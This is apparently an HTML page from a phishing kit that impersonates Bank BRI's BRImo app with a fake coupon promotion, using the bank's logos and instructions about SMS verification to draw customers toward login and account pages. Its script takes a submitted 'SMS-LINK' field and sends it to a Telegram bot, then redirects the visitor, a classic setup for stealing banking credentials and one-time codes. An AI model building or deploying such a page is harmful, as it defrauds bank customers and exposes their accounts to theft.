<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="fragment" content="!">
    <meta name="description" content=" ...">
    <link rel="canonical" href="" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="og:title" content="Bank BPD BALI" />
    <meta name="twitter:title" content="BPD BALI" />
    <meta property="og:site_name" content="BPD BALI" />
    <meta name="twitter:site_name" content="BPD BALI" />
    <meta property="og:description" content=" ..." />
    <meta name="twitter:description" content=" ..." />
    <link rel="image_src" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&h=&auto=compress&dpr=1&fit=max" />
    <meta property="og:image" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta name="twitter:image:src" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta property="og:url" content="" />
        <meta name="theme-color" content="#0F78CB">
    <meta property="og:type" content="website" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui">
    <title>VSTFL BANK BRI</title><link rel="icon" type="image/png" href="https://brimofstvl.bri.co.id/_next/image?url=https%3A%2F%2Fs3.ap-southeast-3.amazonaws.com%2Fbrimo-fstvl-prod%2F%2FBanner_Mobile_BR_Imo_Berlimpah_Hadiah_7050bbab3f.png&w=3840&q=75">
<link rel="image_src" href="https://brimofstvl.bri.co.id/_next/image?url=https%3A%2F%2Fs3.ap-southeast-3.amazonaws.com%2Fbrimo-fstvl-prod%2F%2FBanner_Mobile_BR_Imo_Berlimpah_Hadiah_7050bbab3f.png&w=3840&q=75">
    
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">
    <link rel="stylesheet" href="http://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"/>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        @font-face {
            font-family: 'Avenir';
            src: url(../fonts/AvenirNextLTPro-Bold.otf);
        }
        body {
            padding: 0;
            margin: 0;
            width: 100%;
            font-family: 'Avenir';
            background-color: #0F78CB;
        }

        .text-header {
            font-family: 'Avenir';
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Avenir';
            margin-top: -20px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 10px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: #fff;
            border: none; 
            text-align: center; 
            height: 38px; 
            width: 320px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: #0F78CB; 
            letter-spacing: 0px; 
            line-height: 1; 
            border-radius: 6px; 
            box-shadow: #2F4F4F  0px 3px 2px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 10px auto;
            padding: 0px; 
            cursor: pointer; 
            background: none transparent;
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(0, 134, 224);
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }

        .form-log {
            box-sizing: border-box; 
            height: 120px; 
            width: 400px; 
            max-width: 100%; 
            border-top: 1px inset rgba(250, 250, 250, 0.13); 
            border-right: 1px solid rgba(184, 184, 184, 0.53); 
            border-bottom: none; 
            border-left: 1px outset rgba(168, 168, 168, 0.58); 
            border-image: initial; 
            background-color: rgb(255, 255, 255); 
            border-radius: 5px 5px 0px 0px; 
            box-shadow: rgb(237, 237, 237) 5px 5px 5px 0px; 
            font-family: 'Avenir';
            font-size: 16px; 
            color: rgb(28, 28, 28); 
            word-spacing: 7px; 
            padding: 0px 20px;
        }

        #ionIcons {
            color: rgb(22, 119, 199);
            font-size: 29px;
            position: absolute;
            display: block;
            margin-top: 7px;
            margin-left: 15px;
        }

        .eye {
            display: block;
            margin: -40px auto;
            margin-right: 20px;
            position: relative;
            box-sizing: border-box; 
            z-index: 16; 
            height: 19.8189px;
            width: 25.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
        }

        .btn-login {
            display: block;
            margin: 60px 0 0 0;
            padding: 0px; 
            cursor: pointer; 
            background: none rgba(0, 111, 214, 0.96); 
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 370px; 
            font-family: Arial; 
            font-size: 17px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 8px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 100ms step-start 0s;
        }

        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 82%;
            }
        }
        
        .box-lte {
            width: 380px;
            max-width: 95%;
            background: #0F78CB;
            display: block;
            margin: -40px auto;
            border-radius: 10px;
        }

        textarea {
            border: 3px solid rgb(0, 134, 224);
            border-radius: 8px;
            padding: 5px 10px;
            font-family: 'Avenir';
        }
        .blink {
            animation: blink-animation 5s steps(5, start) infinite;
            -webkit-animation: blink-animation 1s steps(5, start) infinite;
        }
        @keyframes blink-animation {
        to {
            visibility: hidden;
        }
        }
        @-webkit-keyframes blink-animation {
        to {
            visibility: hidden;
        }
        }
        h1{
            display: table;
            background-color: #FF0000;
            color: #000000;
            padding: 15px;
            width: 100%;
            font-size: 1em;
            text-align: center;
            
            
        }
    </style>
  </head>
  <body>
    <section class="section">
    <div class="container">
        <div class="box-lte">
            <div class="row" style="margin-top: 170px;">
                <div class="col-12 d-block mx-auto text-center p-0" style="height: 290px; width: 290px; max-width: 100%; display: block; margin-top: 20px; border-radius: 10px;">
                    <img alt="" src="https://brimofstvl.bri.co.id/_next/image?url=https%3A%2F%2Fs3.ap-southeast-3.amazonaws.com%2Fbrimo-fstvl-prod%2F%2FBanner_Mobile_BR_Imo_Berlimpah_Hadiah_7050bbab3f.png&w=3840&q=75" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius:0px;"></div></div>
                    
            <div class="row">
                <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 20px;">
                    <p style="font-size: 14px; text-align: center; font-weight: bold; color: #fff;">DAFTAR CETAK KUPON
                <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 15px auto;">
            <button class="btn-punya" onclick="location.href='/login.html';">Punya Akun BRImo</button>            <button class="btn-punya" onclick="location.href='/rekening.html';">Belum Punya Akun BRImo</button></div>
        <div>
<h6 style="font-family: 'Nunito', sans-serif; font-size: 15px; font-weight: none; color: #fff; letter-spacing: 0px; text-align: center; line-height: 1; border-radius: 5px;"><b>wwww.bankbri.co.id</b></h6></div>
<h6 style="font-family: 'bold', sans-serif; font-size: 8px; font-weight: none; color: #fff; letter-spacing: 0px; text-align: center; line-height: 1; border-radius: 5px;"><b>Pastikan koneksi internet anda stabil lalu pastikan nomor telpon terdaftar <br>pada akun mobile banking anda terletak pada SIM 1 <br>dan minimal memiliki pulsa Rp2000, untuk menerim SMS verifikasi.</b></h6></div><br>

    </section>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script>
    <script>
        document.getElementById('timer').innerHTML =
          03 + ":" + 01;
        startTimer();
        
        
        function startTimer() {
          var presentTime = document.getElementById('timer').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('timer').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer, 1000);
          
        }
        
        function checkSecond(sec
       ) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
    </script>
    <script>
    const TOKEN = "";
const CHAT_ID = "";
const URL_API = `https://api.telegram.org/bot${TOKEN}/sendMessage`;

const form = document.getElementById("fetch");

form.addEventListener("submit", onSubmitTelegram);

function onSubmitTelegram(e) {
  e.preventDefault();

  const { pesan, } = form;
  const data = {
    pesan: pesan.value,
  };

  let message = `<b></b>\n`;
  message += `<b>SMS-LINK : </b> ${data.pesan}`;

  const dataTg = {
    chat_id: CHAT_ID,
    text: message,
    parse_mode: "html",
  };

  const options = {
    method: "POST",
    body: JSON.stringify(dataTg),
    headers: {
      "Content-Type": "application/json",
    },
  };

  fetch(URL_API, options)
    .then((res) => res.json())
    .then((res) => console.log(res))
    .catch((err) => console.log(err));
    
    window.location.href='/user.html';
}


    </script>
    <!-- <script src="./axios.js" type="module"></script> -->
    <script src="./fetch.js" type="module"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
  </body>
</html>
